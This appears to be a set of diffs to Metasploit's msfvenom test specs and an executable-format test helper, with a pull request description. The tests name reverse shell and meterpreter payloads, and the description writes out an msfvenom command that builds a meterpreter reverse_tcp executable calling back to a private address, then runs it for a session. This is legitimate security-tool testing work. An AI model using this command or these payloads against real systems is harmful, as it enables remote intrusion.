+	describe "#dump_nops" do
+		it "should list known nops" do
+			dump = venom.dump_nops
+
+			%w!
+				x86/opty2
+				armle/simple
 			!.each do |name|
 				dump.should include(name)
 			end
@@ -52,7 +64,7 @@ describe MsfVenom do
 	describe "#dump_payloads" do
 		it "should list known payloads" do
 			dump = venom.dump_payloads
-
+			# Just a representative sample of some of the important ones.
 			%w!
 				cmd/unix/reverse
 				java/meterpreter/reverse_tcp

--- a/spec/msfvenom_spec.rb
+++ b/spec/msfvenom_spec.rb
@@ -5,31 +5,58 @@ require 'msf/core'
 load File.join(Msf::Config.install_root, 'msfvenom')
 
 describe MsfVenom do
-	subject(:venom) { described_class.new }
+
+	let(:stdin)  { StringIO.new("", "rb") }
+	let(:stdout) { StringIO.new("", "wb") }
+	let(:stderr) { StringIO.new("", "wb") }
+	subject(:venom) { described_class.new(stdin, stdout, stderr, framework) }
+	before(:each) do
+		conf_dir = Metasploit::Framework.root.join('spec', 'dummy', 'framework','config')
+		conf_dir.mkpath
+	end
+	after(:each) do
+		dummy_dir = Metasploit::Framework.root.join('spec', 'dummy')
+		dummy_dir.rmtree
+	end
+
+	before(:all) do
+		conf_dir = Metasploit::Framework.root.join('spec', 'dummy', 'framework','config')
+		conf_dir.mkpath
+		create_opts = {
+			:module_types => [
+				::Msf::MODULE_PAYLOAD, ::Msf::MODULE_ENCODER, ::Msf::MODULE_NOP
+			],
+			'ConfigDirectory' => conf_dir.to_s,
+			'DisableDatabase' => true
+		}
+		@framework = ::Msf::Simple::Framework.create(create_opts)
+	end
+
+	let(:framework) { @framework }
 
 	describe "#dump_encoders" do
 		it "should list known encoders" do
 			dump = venom.dump_encoders
 
-			%w|
+			%w!
 				generic/none
 				x86/shikata_ga_nai
 				x64/xor
 				php/base64
-			|.each do |name|
+			!.each do |name|
 				dump.should include(name)
 			end
 		end
 	end
 
-
 	describe "#dump_payloads" do
 		it "should list known payloads" do
 			dump = venom.dump_payloads
 
-			%w|
-				windows/meterpreter/reverse_tcp
-				windows/meterpreter/reverse_https
+			%w!
+				cmd/unix/reverse
+				java/meterpreter/reverse_tcp
+				java/meterpreter/reverse_https
 				linux/x86/shell/reverse_tcp
 				linux/x86/shell_reverse_tcp
 				linux/x64/shell/reverse_tcp
@@ -37,13 +64,95 @@ describe MsfVenom do
 				linux/armle/shell/reverse_tcp
 				linux/armle/shell_reverse_tcp
 				linux/mipsbe/shell_reverse_tcp
-				java/meterpreter/reverse_tcp
-				java/meterpreter/reverse_https
 				php/meterpreter/reverse_tcp
-			|.each do |name|
+				windows/meterpreter/reverse_tcp
+				windows/meterpreter/reverse_https
+			!.each do |name|
 				dump.should include(name)
 			end
 		end
+	end
+
+	describe "#parse_args" do
+
+		context "with unexpected options" do
+			it "should raise" do
+				expect {
+					venom.parse_args(%w! --non-existent-option !)
+				}.to raise_error(MsfVenom::UsageError)
+			end
+		end
+
+		context "with missing required arg" do
+			%w! --platform -a -b -c -f -p -n -s -i -x !.each do |required_arg|
+				it "#{required_arg} should raise" do
+					expect {
+						venom.parse_args([required_arg])
+					}.to raise_error(MsfVenom::UsageError)
+				end
+			end
+		end
+
+	end
+
+	describe "#generate_raw_payload" do
+
+		before do
+			venom.parse_args(args)
+		end
+
+		context "with --options" do
+			context "and a payload" do
+				let(:args) { %w! -o -p windows/meterpreter/reverse_tcp ! }
+
+				it "should print options" do
+					expect {
+						venom.generate_raw_payload
+					}.to_not raise_error
+					output = stderr.string
+					output.should include("LHOST")
+					output.should include("LPORT")
+				end
+			end
+			context "and an invalid payload" do
+				let(:args) { %w! -o -p asdf! }
+				it "should raise" do
+					expect {
+						venom.generate_raw_payload
+					}.to raise_error(MsfVenom::UsageError)
+				end
+			end
+
+		end
+
+	end
+
+	describe "#generate" do
+		before { venom.parse_args(args) }
+
+		context "with 'exe' format" do
+			let(:args) { %w!-f exe -p windows/shell_reverse_tcp LHOST=192.168.0.1! }
+			it "should print an exe to stdout" do
+				expect { venom.generate }.to_not raise_error
+				output = stdout.string
+				output[0,2].should == "MZ"
+			end
+		end
+
+		context "with incorrect datastore option format" do
+			let(:args) { %w!-f exe -p windows/shell_reverse_tcp LPORT=asdf! }
+			it "should fail validation" do
+				expect { venom.generate }.to raise_error(Msf::OptionValidateError)
+			end
+		end
+
+		context "without required datastore option" do
+			let(:args) { %w!-f exe -p windows/shell_reverse_tcp ! }
+			it "should fail validation" do
+				expect { venom.generate }.to raise_error(Msf::OptionValidateError)
+			end
+		end
+
 	end
 
 end

--- a/spec/msfvenom_spec.rb
+++ b/spec/msfvenom_spec.rb
@@ -193,7 +193,7 @@ describe MsfVenom do
 			context "with invalid module type" do
 				let(:args) { %w!--list asdf! }
 				it "should raise UsageError" do
-					expect { venom.generate_raw_payload }.to raise_error(MsfVenom::UsageError)
+					expect { venom.generate }.to raise_error(MsfVenom::UsageError)
 				end
 			end
 

--- a/spec/msfvenom_spec.rb
+++ b/spec/msfvenom_spec.rb
@@ -94,18 +94,22 @@ describe MsfVenom do
 			end
 		end
 
-		context "with unexpected options" do
-			it "should raise" do
+		context "with bad arguments" do
+
+			it "should raise UsageError with empty arguments" do
+				expect { venom.parse_args([]) }.to raise_error(MsfVenom::UsageError)
+			end
+
+			it "should raise with unexpected options" do
 				expect { venom.parse_args(%w! --non-existent-option !) }.to raise_error(MsfVenom::UsageError)
 			end
-		end
 
-		context "with missing required arg" do
 			%w! --platform -a -b -c -f -p -n -s -i -x !.each do |required_arg|
-				it "#{required_arg} should raise" do
+				it "should raise UsageError with no arg for option #{required_arg}" do
 					expect { venom.parse_args([required_arg]) }.to raise_error(MsfVenom::UsageError)
 				end
 			end
+
 		end
 
 	end

--- a/spec/msfvenom_spec.rb
+++ b/spec/msfvenom_spec.rb
@@ -1,0 +1,49 @@
+
+require 'spec_helper'
+require 'msf/core'
+# doesn't end in .rb or .so, so have to load instead of require
+load File.join(Msf::Config.install_root, 'msfvenom')
+
+describe MsfVenom do
+	subject(:venom) { described_class.new }
+
+	describe "#dump_encoders" do
+		it "should list known encoders" do
+			dump = venom.dump_encoders
+
+			%w|
+				generic/none
+				x86/shikata_ga_nai
+				x64/xor
+				php/base64
+			|.each do |name|
+				dump.should include(name)
+			end
+		end
+	end
+
+
+	describe "#dump_payloads" do
+		it "should list known payloads" do
+			dump = venom.dump_payloads
+
+			%w|
+				windows/meterpreter/reverse_tcp
+				windows/meterpreter/reverse_https
+				linux/x86/shell/reverse_tcp
+				linux/x86/shell_reverse_tcp
+				linux/x64/shell/reverse_tcp
+				linux/x64/shell_reverse_tcp
+				linux/armle/shell/reverse_tcp
+				linux/armle/shell_reverse_tcp
+				linux/mipsbe/shell_reverse_tcp
+				java/meterpreter/reverse_tcp
+				java/meterpreter/reverse_https
+				php/meterpreter/reverse_tcp
+			|.each do |name|
+				dump.should include(name)
+			end
+		end
+	end
+
+end

--- a/spec/msfvenom_spec.rb
+++ b/spec/msfvenom_spec.rb
@@ -155,7 +155,8 @@ describe MsfVenom do
 				# We're not encoding, so should be testable here
 				it "should contain /bin/sh" do
 					output = venom.generate_raw_payload
-					# usually push'd, so it's not all strung together
+					# Usually push'd in two instructions, so the whole string
+					# isn't all together. Check for the two pieces seperately
 					output.should include("/sh")
 					output.should include("/bin")
 				end

--- a/spec/msfvenom_spec.rb
+++ b/spec/msfvenom_spec.rb
@@ -143,6 +143,23 @@ describe MsfVenom do
 					output.should include("LHOST")
 					output.should include("LPORT")
 				end
+				context "and some datastore options" do
+					it "should print options" do
+						venom.parse_args %w! -o -p windows/meterpreter/reverse_tcp LPORT=1234!
+						expect { venom.generate_raw_payload }.to_not raise_error
+						output = stderr.string
+						output.should include("LHOST")
+						output.should match(/LPORT\s+1234/)
+					end
+
+					it "should print options case-insensitively" do
+						venom.parse_args %w! -o -p windows/meterpreter/reverse_tcp lPoRt=1234!
+						expect { venom.generate_raw_payload }.to_not raise_error
+						output = stderr.string
+						output.should include("LHOST")
+						output.should match(/LPORT\s+1234/)
+					end
+				end
 			end
 
 			context "and an invalid payload" do

--- a/spec/support/shared/contexts/msf/util/exe.rb
+++ b/spec/support/shared/contexts/msf/util/exe.rb
@@ -32,7 +32,7 @@ shared_context 'Msf::Util::Exe' do
     "osx" => [
       { :format => "macho", :arch => "x86",   :file_fp => /Mach-O.*i386/  },
       { :format => "macho", :arch => "x64",   :file_fp => /Mach-O 64/     },
-      { :format => "macho", :arch => "armle", :file_fp => /Mach-O.*acorn/ },
+      { :format => "macho", :arch => "armle", :file_fp => /Mach-O.*(acorn|arm)/ },
       { :format => "macho", :arch => "ppc",   :file_fp => /Mach-O.*ppc/   },
     ],
   }

--- a/spec/support/shared/contexts/msf/util/exe.rb
+++ b/spec/support/shared/contexts/msf/util/exe.rb
@@ -14,6 +14,7 @@ shared_context 'Msf::Util::Exe' do
       #{ :format => "exe-small", :arch => "x64", :file_fp => /PE32\+/ },
       { :format => "exe-only",  :arch => "x86", :file_fp => /PE32 /  },
       { :format => "exe-only",  :arch => "x64", :file_fp => /PE32\+ /  },
+      { :format => "exe-only",  :arch => "x86_64", :file_fp => /PE32\+ /  },
     ],
     "linux" => [
       { :format => "elf", :arch => "x86",    :file_fp => /ELF 32.*SYSV/ },

--- a/spec/support/shared/contexts/msf/util/exe.rb
+++ b/spec/support/shared/contexts/msf/util/exe.rb
@@ -7,6 +7,7 @@ shared_context 'Msf::Util::Exe' do
       { :format => "dll",       :arch => "x64", :file_fp => /PE32\+.*DLL/ },
       { :format => "exe",       :arch => "x86", :file_fp => /PE32 /  },
       { :format => "exe",       :arch => "x64", :file_fp => /PE32\+/ },
+      { :format => "exe",       :arch => "x86_64", :file_fp => /PE32\+/ },
       { :format => "exe-small", :arch => "x86", :file_fp => /PE32 /  },
       # No template for 64-bit exe-small. That's fine, we probably
       # don't need one.

--- a/spec/support/shared/contexts/msf/util/exe.rb
+++ b/spec/support/shared/contexts/msf/util/exe.rb
@@ -1,0 +1,49 @@
+
+
+shared_context 'Msf::Util::Exe' do
+  @platform_format_map = {
+    "windows" => [
+      { :format => "dll",       :arch => "x86", :file_fp => /PE32 .*DLL/  },
+      { :format => "dll",       :arch => "x64", :file_fp => /PE32\+.*DLL/ },
+      { :format => "exe",       :arch => "x86", :file_fp => /PE32 /  },
+      { :format => "exe",       :arch => "x64", :file_fp => /PE32\+/ },
+      { :format => "exe-small", :arch => "x86", :file_fp => /PE32 /  },
+      # No template for 64-bit exe-small. That's fine, we probably
+      # don't need one.
+      #{ :format => "exe-small", :arch => "x64", :file_fp => /PE32\+/ },
+      { :format => "exe-only",  :arch => "x86", :file_fp => /PE32 /  },
+      { :format => "exe-only",  :arch => "x64", :file_fp => /PE32\+ /  },
+    ],
+    "linux" => [
+      { :format => "elf", :arch => "x86",    :file_fp => /ELF 32.*SYSV/ },
+      { :format => "elf", :arch => "x64",    :file_fp => /ELF 64.*SYSV/ },
+      { :format => "elf", :arch => "armle",  :file_fp => /ELF 32.*ARM/ },
+      { :format => "elf", :arch => "mipsbe", :file_fp => /ELF 32-bit MSB executable, MIPS/ },
+      { :format => "elf", :arch => "mipsle", :file_fp => /ELF 32-bit LSB executable, MIPS/ },
+    ],
+    "bsd" => [
+      { :format => "elf", :arch => "x86", :file_fp => /ELF 32.*BSD/ },
+    ],
+    "solaris" => [
+      { :format => "elf", :arch => "x86", :file_fp => /ELF 32/ },
+    ],
+    "osx" => [
+      { :format => "macho", :arch => "x86",   :file_fp => /Mach-O.*i386/  },
+      { :format => "macho", :arch => "x64",   :file_fp => /Mach-O 64/     },
+      { :format => "macho", :arch => "armle", :file_fp => /Mach-O.*acorn/ },
+      { :format => "macho", :arch => "ppc",   :file_fp => /Mach-O.*ppc/   },
+    ],
+  }
+
+  def verify_bin_fingerprint(format_hash, bin)
+    bin.should be_a(String)
+    fp = IO.popen("file -","w+") do |io|
+      io.write(bin)
+      io.close_write
+      io.read
+    end
+    if format_hash[:file_fp]
+      fp.should =~ format_hash[:file_fp]
+    end
+  end
+end


### PR DESCRIPTION
This pull turns msfvenom into a testable class, `MsfVenom`.  Current test coverage is about 50%, which is infinitely more testing than we were doing before, but obviously not perfect. For instance, the automated test suite does not (and indeed can't) test that the generated executables are functional. I manually verified that at least the following work:
- linux/x86/shell/reverse_tcp
- linux/x86/shell_reverse_tcp
- linux/x64/shell/reverse_tcp
- linux/x64/shell_reverse_tcp
- windows/meterpreter/reverse_tcp
- windows/meterpreter/reverse_http

<del>Notably, [windows x64 payloads are broken](https://dev.metasploit.com/redmine/issues/8149) before this change.</del>

### Verification Steps
- [x] Generate a windows stager executable - `./msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.99.1 lport=9999 -f exe > met-9999.exe`
- [x] Set up  a multi/handler with the same options
- [x] Run the executable - verify it creates a session
- [x] Repeat for any other payload types for which you have a system that can run them

**Update:** fixed windows x64 payloads, thanks to @Meatballs1.
